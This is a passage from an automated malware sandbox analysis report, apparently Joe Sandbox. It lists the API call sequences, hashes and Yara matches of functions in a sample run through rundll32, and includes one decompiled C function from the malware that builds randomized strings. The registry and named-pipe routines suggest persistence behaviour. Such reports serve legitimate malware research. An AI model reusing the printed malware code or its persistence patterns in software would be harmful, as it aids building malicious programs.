                              • Part of subcall function 04F63263: lstrlen.KERNEL32(?,00000000,04F83716,00000000,04F72466,?,?,?,04F78A07,?,?,?,00000000,00000001,00000000,?), ref: 04F6326D
                              • Part of subcall function 04F63263: lstrcpy.KERNEL32(00000000,?), ref: 04F63291
                              • Part of subcall function 04F63263: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,04F78A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 04F63298
                              • Part of subcall function 04F63263: lstrcat.KERNEL32(00000000,?), ref: 04F632EF
                            • lstrlen.KERNEL32(00000000,00000000), ref: 04F7E381
                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04F7E398
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7E3A9
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7E3B5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                            • String ID:
                            • API String ID: 773763258-0
                            • Opcode ID: 990c7fdcfd07a333d11f6b1ed7d40115db3f6975631bd61e55baa2d7dcb0baed
                            • Instruction ID: 51898b8b2a1a09d61d028166e06ff604dc4729a5dbaea3e4442802eccb161e98
                            • Opcode Fuzzy Hash: 990c7fdcfd07a333d11f6b1ed7d40115db3f6975631bd61e55baa2d7dcb0baed
                            • Instruction Fuzzy Hash: 7A71E571D00219EFDB11DFA5EC84DAEBBB9FF09314F04405AE605AB220D738A956EF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F651FF Relevance: 18.2, APIs: 12, Instructions: 186synchronizationstringthreadCOMMON
                            Download Yara Rule
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04F65226
                            • memcpy.NTDLL(?,?,00000010), ref: 04F65249
                            • memset.NTDLL ref: 04F65295
                            • lstrcpyn.KERNEL32(?,?,00000034), ref: 04F652A9
                            • GetLastError.KERNEL32 ref: 04F652D7
                            • GetLastError.KERNEL32 ref: 04F6531E
                            • GetLastError.KERNEL32 ref: 04F6533D
                            • WaitForSingleObject.KERNEL32(?,000927C0), ref: 04F65377
                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04F65385
                            • GetLastError.KERNEL32 ref: 04F65408
                            • ReleaseMutex.KERNEL32(?), ref: 04F6541A
                            • RtlExitUserThread.NTDLL(?), ref: 04F65430
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                            • String ID:
                            • API String ID: 4037736292-0
                            • Opcode ID: bb39ac55b2858f03dc819e7f1d7ce441cb0330a66c3d46c347b03888d56b4a82
                            • Instruction ID: 5a620bdf2016709922d812da25fcfc8fbd0169c8df59c6cb87b8bfe2c5de522e
                            • Opcode Fuzzy Hash: bb39ac55b2858f03dc819e7f1d7ce441cb0330a66c3d46c347b03888d56b4a82
                            • Instruction Fuzzy Hash: 95618E71904705BFD7209F25EC49A2BBBE9FF84B10F40991DF596E6180E7B4E8068B62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6D9F6 Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000,761B5520,?,00000000,?,?,?), ref: 04F6DA0C
                            • lstrlen.KERNEL32(?), ref: 04F6DA14
                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F6DA24
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F6DA43
                            • lstrlen.KERNEL32(?), ref: 04F6DA58
                            • lstrlen.KERNEL32(?), ref: 04F6DA66
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 04F6DAB4
                            • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 04F6DAD8
                            • lstrlen.KERNEL32(?), ref: 04F6DB0B
                            • HeapFree.KERNEL32(00000000,?,?), ref: 04F6DB36
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 04F6DB4D
                            • HeapFree.KERNEL32(00000000,?,?), ref: 04F6DB5A
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                            • String ID:
                            • API String ID: 904523553-0
                            • Opcode ID: 3c6bbbcc2a294afe9342db2e1069650cbe8b05826295e650c2e1c5e6a7bcf981
                            • Instruction ID: 6c6d494332ae04ee0266de0ca5bbad7ea86cf09c71962db9c0212c6b0e08527f
                            • Opcode Fuzzy Hash: 3c6bbbcc2a294afe9342db2e1069650cbe8b05826295e650c2e1c5e6a7bcf981
                            • Instruction Fuzzy Hash: 69416971A0024ABFDF118FA0DC40AAE7BB9FF84310F10806AF916AB150D734E912EB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F71FE9 Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04F7201B
                            • WaitForSingleObject.KERNEL32(000005BC,00000000), ref: 04F7203D
                            • ConnectNamedPipe.KERNEL32(?,?), ref: 04F7205D
                            • GetLastError.KERNEL32 ref: 04F72067
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F7208B
                            • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 04F720CE
                            • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 04F720D7
                            • WaitForSingleObject.KERNEL32(00000000), ref: 04F720E0
                            • CloseHandle.KERNEL32(?), ref: 04F720F5
                            • GetLastError.KERNEL32 ref: 04F72102
                            • CloseHandle.KERNEL32(?), ref: 04F7210F
                            • RtlExitUserThread.NTDLL(000000FF), ref: 04F72125
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                            • String ID:
                            • API String ID: 4053378866-0
                            • Opcode ID: fe90f63fb7febcce0cac6f89d96ee4ec8d59e4b04923bea623142c3a50dcffc4
                            • Instruction ID: ec48ed824bb546c6e4b7f010d54a97009de52edc7d1ae2b0eab4db54bf9ebdff
                            • Opcode Fuzzy Hash: fe90f63fb7febcce0cac6f89d96ee4ec8d59e4b04923bea623142c3a50dcffc4
                            • Instruction Fuzzy Hash: 9331B370404709BFE7109F24EC4896FBBA9FF44314F110A2EF561D6090D778AE46CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F74140 Relevance: 18.1, APIs: 12, Instructions: 95registrymemorystringCOMMON
                            Download Yara Rule
                            APIs
                            • RtlImageNtHeader.NTDLL(?), ref: 04F74151
                            • GetTempPathA.KERNEL32(00000000,00000000,?,?,04F709CF,00000094,00000000,00000000,?), ref: 04F74169
                            • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 04F74178
                            • GetTempPathA.KERNEL32(00000001,00000000,?,?,04F709CF,00000094,00000000,00000000,?), ref: 04F7418B
                            • GetTickCount.KERNEL32 ref: 04F7418F
                            • wsprintfA.USER32 ref: 04F741A6
                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04F741E1
                            • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 04F74201
                            • lstrlen.KERNEL32(00000000), ref: 04F7420B
                            • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 04F7421B
                            • RegCloseKey.ADVAPI32(?), ref: 04F74227
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 04F74235
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                            • String ID:
                            • API String ID: 3778301466-0
                            • Opcode ID: 26949cff4ec4a1f0dd5cd71e371879a3f8c3a342fe0a538f5ea8722f5006fc34
                            • Instruction ID: f3a085172360280cdf1543e647f2360d834b051efdaf2691f6cbbb9d02d377ff
                            • Opcode Fuzzy Hash: 26949cff4ec4a1f0dd5cd71e371879a3f8c3a342fe0a538f5ea8722f5006fc34
                            • Instruction Fuzzy Hash: 2E3129B1900119FFDB119FA4EC88DBF7BACEF45359B00406AFA05DB100D6789E55DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F65093 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON
                            Download Yara Rule
                            APIs
                            • RtlImageNtHeader.NTDLL(00000000), ref: 04F650BD
                            • GetCurrentThreadId.KERNEL32 ref: 04F650D3
                            • GetCurrentThread.KERNEL32 ref: 04F650E4
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                              • Part of subcall function 04F7508C: GetCurrentThreadId.KERNEL32 ref: 04F750C4
                              • Part of subcall function 04F7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                              • Part of subcall function 04F7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                              • Part of subcall function 04F7508C: lstrcpy.KERNEL32(00000000), ref: 04F75100
                              • Part of subcall function 04F80551: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,761B5520,00000000,?,04F6512E,00000020,00000000,?,00000000), ref: 04F805BC
                              • Part of subcall function 04F80551: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,761B5520,00000000,?,04F6512E,00000020,00000000,?,00000000), ref: 04F805E4
                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 04F6515E
                            • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 04F6516A
                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 04F651B9
                            • wsprintfA.USER32 ref: 04F651D1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 04F651DC
                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 04F651F3
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                            • String ID: W
                            • API String ID: 630447368-655174618
                            • Opcode ID: acb4174864d965d4cee7ab8a0111f20a2802fe744301fe0f67c436dda56b9851
                            • Instruction ID: a3c2448ce4c1239abfc0c3400d141454633ead9584cc3ff7f5accbb1c068139f
                            • Opcode Fuzzy Hash: acb4174864d965d4cee7ab8a0111f20a2802fe744301fe0f67c436dda56b9851
                            • Instruction Fuzzy Hash: 4A415071900119FFDF129FA1EC48DAE7FB9FF45748B04401AF905AA110D738AA56EFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7B804 Relevance: 16.7, APIs: 11, Instructions: 157registrystringfileCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04F7B82F
                              • Part of subcall function 04F7447B: RegCloseKey.ADVAPI32(?,?), ref: 04F74502
                            • RegOpenKeyA.ADVAPI32(80000001,04F74833,?), ref: 04F7B86A
                            • lstrcpyW.KERNEL32(-00000002,94E85600), ref: 04F7B8CC
                            • lstrcatW.KERNEL32(00000000,?), ref: 04F7B8E1
                            • lstrcpyW.KERNEL32(?), ref: 04F7B8FB
                            • lstrcatW.KERNEL32(00000000,?), ref: 04F7B90A
                              • Part of subcall function 04F7452B: lstrlenW.KERNEL32(?,?,?,04F6E51D,?,?,?,?,00001000,?,?,00001000), ref: 04F7453E
                              • Part of subcall function 04F7452B: lstrlen.KERNEL32(?,?,04F6E51D,?,?,?,?,00001000,?,?,00001000), ref: 04F74549
                              • Part of subcall function 04F7452B: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 04F7455E
                            • RegCloseKey.ADVAPI32(04F74833,?,?,04F74833), ref: 04F7B974
                              • Part of subcall function 04F6C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,04F6171E,?,?,00000000,?), ref: 04F6C2B6
                              • Part of subcall function 04F6C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,04F6171E,?,?,00000000,?), ref: 04F6C2DE
                              • Part of subcall function 04F6C2AA: memset.NTDLL ref: 04F6C2F0
                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,04F74833), ref: 04F7B9A9
                            • GetLastError.KERNEL32(?,?,04F74833), ref: 04F7B9B4
                            • HeapFree.KERNEL32(00000000,00000000,?,?,04F74833), ref: 04F7B9CA
                            • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,04F74833), ref: 04F7B9DC
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                            • String ID:
                            • API String ID: 1430934453-0
                            • Opcode ID: 1b816aa1cf2767555d60c8ab65dde50bf741af56c1b694c73be6d1ed30338d1d
                            • Instruction ID: 70a916302f3c064421259de90d86c5c46229e8f1e1968d093c0f9b072cf727b8
                            • Opcode Fuzzy Hash: 1b816aa1cf2767555d60c8ab65dde50bf741af56c1b694c73be6d1ed30338d1d
                            • Instruction Fuzzy Hash: 65513C72900119FBDB119FA4EC44EBE7BB9EF49348B10405AF951AB151D739FE02DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A162F6 Relevance: 16.6, APIs: 11, Instructions: 145stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 55%
                            			E04A162F6(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				WCHAR* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				WCHAR* _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				WCHAR* _t125;

				_t58 =  *0x4a1a3dc; // 0x5539c18
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E04A17367();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E04A17367();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E04A1117A(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E04A1117A(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E04A167E7(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x4a1918c;
						}
						_t70 = E04A1659E(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E04A16D63(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x4a1a348; // 0xb1d5a8
								_t28 = _t105 + 0x4a1bb30; // 0x530025
								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E04A167E7(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x4a19190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E04A16D63(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E04A16C2C(_v24);
								} else {
									_t92 =  *0x4a1a348; // 0xb1d5a8
									_t44 = _t92 + 0x4a1bca8; // 0x73006d
									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E04A16C2C(_v8);
						}
						E04A16C2C(_v12);
					}
					E04A16C2C(_v16);
				}
				return _v28;
			}


































                            0x04a162fc
                            0x04a16304
                            0x04a16307
                            0x04a16314
                            0x04a16317
                            0x04a1631e
                            0x04a16325
                            0x04a16328
                            0x04a16335
                            0x04a16338
                            0x04a1633b
                            0x04a16340
                            0x04a16345
                            0x04a1634d
                            0x04a16352
                            0x04a16357
                            0x04a1635d
                            0x04a16361
                            0x04a1636a
                            0x04a1636e
                            0x04a16370
                            0x04a16370
                            0x04a16378
                            0x04a1637d
                            0x04a16382
                            0x04a16388
                            0x04a1638f
                            0x04a163a0
                            0x04a163a7
                            0x04a163b9
                            0x04a163be
                            0x04a163c3
                            0x04a163cc
                            0x04a163de
                            0x04a163f4
                            0x04a163f9
                            0x04a163fd
                            0x04a16401
                            0x04a16406
                            0x04a1640b
                            0x04a1640d
                            0x04a1640d
                            0x04a16417
                            0x04a16420
                            0x04a16427
                            0x04a16443
                            0x04a16447
                            0x04a16480
                            0x04a16449
                            0x04a1644c
                            0x04a16454
                            0x04a16465
                            0x04a1646d
                            0x04a16475
                            0x04a16479
                            0x04a16479
                            0x04a16447
                            0x04a16488
                            0x04a16488
                            0x04a16490
                            0x04a16490
                            0x04a16498
                            0x04a16498
                            0x04a164a4

                            APIs
                            • GetTickCount.KERNEL32 ref: 04A1630E
                            • lstrlen.KERNEL32(00000000,00000005), ref: 04A1638F
                            • lstrlen.KERNEL32(?), ref: 04A163A0
                            • lstrlen.KERNEL32(00000000), ref: 04A163A7
                            • lstrlenW.KERNEL32(80000002), ref: 04A163AE
                            • wsprintfW.USER32 ref: 04A163F4
                            • lstrlen.KERNEL32(?,00000004), ref: 04A16417
                            • lstrlen.KERNEL32(?), ref: 04A16420
                            • lstrlen.KERNEL32(?), ref: 04A16427
                            • lstrlenW.KERNEL32(?), ref: 04A1642E
                            • wsprintfW.USER32 ref: 04A16465
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: lstrlen$wsprintf$CountFreeHeapTick
                            • String ID:
                            • API String ID: 822878831-0
                            • Opcode ID: 33bb52589c1e4d6fc20da14e519ae781c2c57eae41fb7612c1c0ab6b9a97c65a
                            • Instruction ID: 1025926730d885913a24c56b9e9880dd6c3aa2249748214d709c495e1e9c954d
                            • Opcode Fuzzy Hash: 33bb52589c1e4d6fc20da14e519ae781c2c57eae41fb7612c1c0ab6b9a97c65a
                            • Instruction Fuzzy Hash: B3516D72D00219ABDF12AFA4DD44EDE7BB6EF48314F058065F904A7270DB35EA11DBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F75353 Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 04F75389
                            • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 04F7539E
                            • RegCreateKeyA.ADVAPI32(80000001,?), ref: 04F753C6
                            • HeapFree.KERNEL32(00000000,?), ref: 04F75407
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F75417
                            • RtlAllocateHeap.NTDLL(00000000,04F6DA9D), ref: 04F7542A
                            • RtlAllocateHeap.NTDLL(00000000,04F6DA9D), ref: 04F75439
                            • HeapFree.KERNEL32(00000000,00000000,?,04F6DA9D,00000000,?,?,?), ref: 04F75483
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,04F6DA9D,00000000,?,?,?,?), ref: 04F754A7
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,04F6DA9D,00000000,?,?,?), ref: 04F754CC
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04F6DA9D,00000000,?,?,?), ref: 04F754E1
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$Allocate$CloseCreate
                            • String ID:
                            • API String ID: 4126010716-0
                            • Opcode ID: 329038ae3fc029b95148092207631ad9cb9ed4baecfe2090103abb0574559627
                            • Instruction ID: 3dd9181f6d77cd17a82f2683f4cbcfc65fd2c6026d722e97d5fa03dfe1c26432
                            • Opcode Fuzzy Hash: 329038ae3fc029b95148092207631ad9cb9ed4baecfe2090103abb0574559627
                            • Instruction Fuzzy Hash: A3519EB5D0021DFFDF019F94E8848EEBBB9FB08315F10546AE915A6120D3399E95EF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6CEC3 Relevance: 16.6, APIs: 11, Instructions: 121memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • PathFindFileNameW.SHLWAPI(?), ref: 04F6CEDD
                            • PathFindFileNameW.SHLWAPI(?), ref: 04F6CEF3
                            • lstrlenW.KERNEL32(00000000), ref: 04F6CF36
                            • RtlAllocateHeap.NTDLL(00000000,04F8350B), ref: 04F6CF4C
                            • memcpy.NTDLL(00000000,00000000,04F83509), ref: 04F6CF5F
                            • _wcsupr.NTDLL ref: 04F6CF6B
                            • lstrlenW.KERNEL32(?,04F83509), ref: 04F6CFA4
                            • RtlAllocateHeap.NTDLL(00000000,?,04F83509), ref: 04F6CFB9
                            • lstrcpyW.KERNEL32(00000000,?), ref: 04F6CFCF
                            • lstrcatW.KERNEL32(00000000,?), ref: 04F6CFF5
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F6D004
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                            • String ID:
                            • API String ID: 3868788785-0
                            • Opcode ID: ad9d13094934d4b5a5f77758915d843c44a1d3b7aa126c1eff968700258df7fc
                            • Instruction ID: 6f916ab0937c1ef2e25b01e6b1b28d26be8435e26f1cdd8ca7ee74ae90d860e5
                            • Opcode Fuzzy Hash: ad9d13094934d4b5a5f77758915d843c44a1d3b7aa126c1eff968700258df7fc
                            • Instruction Fuzzy Hash: DC31F332A00259BFC7205F74BC8893F77A8EB89710B14051EFAA7DB145DB75BC068BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6161A Relevance: 16.6, APIs: 11, Instructions: 102registrymemorystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04F6163E
                              • Part of subcall function 04F7447B: RegCloseKey.ADVAPI32(?,?), ref: 04F74502
                            • lstrcmpiW.KERNEL32(?,?,?,?,00000000,?,00000000,?), ref: 04F6166D
                            • lstrlenW.KERNEL32(?,?,?,00000000,?,00000000,?), ref: 04F6167E
                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04F616B8
                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00000000,?), ref: 04F616DA
                            • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 04F616E3
                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04F616F9
                            • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 04F6170E
                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04F61722
                            • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 04F61737
                            • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 04F61740
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                            • String ID:
                            • API String ID: 534682438-0
                            • Opcode ID: d85df38c03ff6c1e9055a7670a21b71d67f957c871dc1161ba43c5a80a9acc85
                            • Instruction ID: 76be7692ad9f0253f335ece35770fdeea4364a00c4f8be85f870a8ec0480a598
                            • Opcode Fuzzy Hash: d85df38c03ff6c1e9055a7670a21b71d67f957c871dc1161ba43c5a80a9acc85
                            • Instruction Fuzzy Hash: 0C314A75900108FFCB129FA4FC88CBE7BB9FB48344B144059F606EA010D37A9E46EB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F733CD Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 04F733E4
                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,04F70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,04F6C1F8,00000000,00000094), ref: 04F733F6
                            • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,04F70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,04F6C1F8,00000000,00000094), ref: 04F73403
                            • wsprintfA.USER32 ref: 04F7341E
                            • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,04F6C1F8,00000000,00000094,00000000), ref: 04F73434
                            • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 04F7344D
                            • WriteFile.KERNEL32(00000000,00000000), ref: 04F73455
                            • GetLastError.KERNEL32 ref: 04F73463
                            • CloseHandle.KERNEL32(00000000), ref: 04F7346C
                            • GetLastError.KERNEL32(?,00000000,?,04F70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,04F6C1F8,00000000,00000094,00000000), ref: 04F7347D
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,04F70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,04F6C1F8,00000000,00000094), ref: 04F7348D
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
